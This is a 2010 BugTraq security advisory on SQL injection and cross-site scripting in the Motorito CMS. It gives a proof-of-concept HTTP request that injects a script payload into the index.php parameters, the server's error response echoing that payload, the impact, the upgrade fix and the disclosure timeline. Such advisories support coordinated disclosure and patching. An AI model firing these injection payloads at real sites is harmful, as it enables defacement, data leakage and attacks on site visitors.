BugTraq
[ISecAuditors Security Advisories] SQL Injection and XSS in Motorito < v2.0 Ni 483 Sep 23 2010 01:52PM
ISecAuditors Security Advisories (advisories isecauditors com)
=============================================
INTERNET SECURITY AUDITORS ALERT 2010-005
- Original release date: March 30th, 2010
- Last revised: September 23th, 2010
- Discovered by: Mario Diaz Caldera
- Severity: 5.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
SQL Injection and XSS in Motorito < v2.0 Ni 483

II. BACKGROUND
-------------------------
Motorito is an on-line marketing tool. It is used to manage the
contents of Web Site, create new content, decide which news to put on
the cover, update product catalog, manage the areas of promotion,
manage users, edit the menu items, layout, send e-mails, etc.

III. DESCRIPTION
-------------------------
This bug was found using CENTOS and the last release of Motorito with
Apache 2.2.3 and PHP 5.1.6.

To exploit the vulnerability only is needed use the version 1.0 of the
HTTP protocol to interact with the application, and it is possible to
check that the variables of the module index.php are not properly
filtered.

IV. PROOF OF CONCEPT
-------------------------
GET
/?mmod=>"'><script>alert(4135)</script>&file=>"'><script>alert(4135)</sc
ript>
HTTP/1.0
Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.testhostwithmotorito.es
Referer: http://www.testhostwithmotorito.es/

HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID
FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '><script>alert(4135)</script>'' at line 1)<br>
Session halted.

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also
possible.

VI. SYSTEMS AFFECTED
-------------------------
Motorito < v2.0 Ni 483

VII. SOLUTION
-------------------------
Upgrade to next version of Motorito. It can be obtained from
http://www.motorito.com
Current version (at advisory publication 2.0 - Ni 891).

VIII. REFERENCES
-------------------------
http://www.motorito.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 30, 2010: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
February 22, 2010: Discovered by Internet Security Auditors.
June 14, 2010: Sent to the vendor.
Response about revision and inclusion in
Project Plan.
September 23, 2010: Request for update. Response about correction.
September 23, 2010: Sent to public lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus